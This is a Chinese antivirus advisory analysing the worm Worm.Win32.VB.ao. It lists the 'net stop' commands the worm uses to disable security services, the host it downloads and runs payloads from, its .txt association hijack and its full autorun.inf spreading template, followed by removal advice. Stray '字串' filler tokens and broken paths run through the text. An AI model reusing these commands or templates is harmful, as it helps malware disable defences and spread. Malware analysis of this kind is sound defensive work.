Worm.Win32.VB.ao

病毒名称：Worm.Win32.VB.ao

截获时间：2007-9-04

入库版本：19.39.30

类型：蠕虫

感染的操作系统：Windows 98, Windows 95, Windows XP, Windows Me, Windows Vista, Windows NT, Windows Server 2003, Windows 2000 字串2

威胁情况： 字串7

传播级别：高 字串6

全球化传播态势：中

字串3

清除难度：容易 字串6

破坏力：高 字串8

破坏手段：下载病毒执行 字串6

这是一个Visual Basic编写的病毒程序 字串7

病毒一开始会遍历进程，查找如下进程runiep.exe,ras.exe,MPG4C32.exe,imsins.exe,Iparmor.exe,

360safe.exe,360tray.exe,kmailmon.exe,

kavstart.exe,clsmn.exe,client.exe,pubwin.exe.。找到后，就直接用TerminateProcess关闭这些安全软件的进程。 字串8

病毒会在%SYSTEM%目录中释放alcwzrd.exe,inetres.exe,notep.exe,SoundMan.exe

字串3

病毒会执行如下的命令，关闭一些安全软件的服务，使这些安全软件失效。

cmd.exe /c net stop shaRedaccess

cmd.exe /c net stop KPfwSvc

cmd.exe /c net stop KWatchsvc

cmd.exe /c net stop McShield

cmd.exe /c net stop "Norton AntiVirUs Server"

cmd.exe /c del %SystemRoot%system32updeta.exe

字串3

病毒会通过InternetReadFile,从http://www.webyE163.cn/zb/2.txt这个网址上读取需要下载的文件列表，然后用URLDownLoadFile按照列表上的地址逐个下载，并保存在本机的%SYSTEM%目录中，再执行。由于列表网址已经失效，所以我们无法得知需要下载的程序都是什么。

病毒会修改后缀".txt"的关联项，使用户在打开txt文件的时候就会自动运行病毒，如下：

HKEY_CLASSES_ROOTxtfileshellopencommand

\notep.exe %1

同时这个病毒还有传播的功能，它会向D盘写入auto.exe(也就是病毒本身)和autorun.inf,其中autorun.inf内容为：

[AutoRun]

open=auto.exe

shellAutocommand=auto.exe

shellexecute=auto.exe

shellopenCommand=auto.exe

shellexploreCommand=auto.exe

shellfindCommand=auto.exe 字串8

安全建议： 字串5

1 安装正版杀毒软件、个人防火墙和卡卡上网安全助手,并及时升级，瑞星杀毒软件每天至少升级三次。 字串1

2 使用“瑞星系统安全漏洞扫描”，打好补丁，弥补系统漏洞。 字串3

3 不浏览不良网站，不随意下载安装可疑插件。 字串4

4 不接收QQ、MSN、Emial等传来的可疑文件。 字串3

5 上网时打开杀毒软件实时监控功能。 字串7

6 把网银、网游、QQ等重要软件加入到“瑞星帐号保险柜”中，可以有效保护密码安全。 字串2

清除办法：

字串4

1 . 瑞星杀毒软件清除办法： 字串2

安装瑞星杀毒软件，升级到19.39.30版以上，对电脑进行全盘扫描，按照软件提示进行操作，即可彻底查杀。

字串5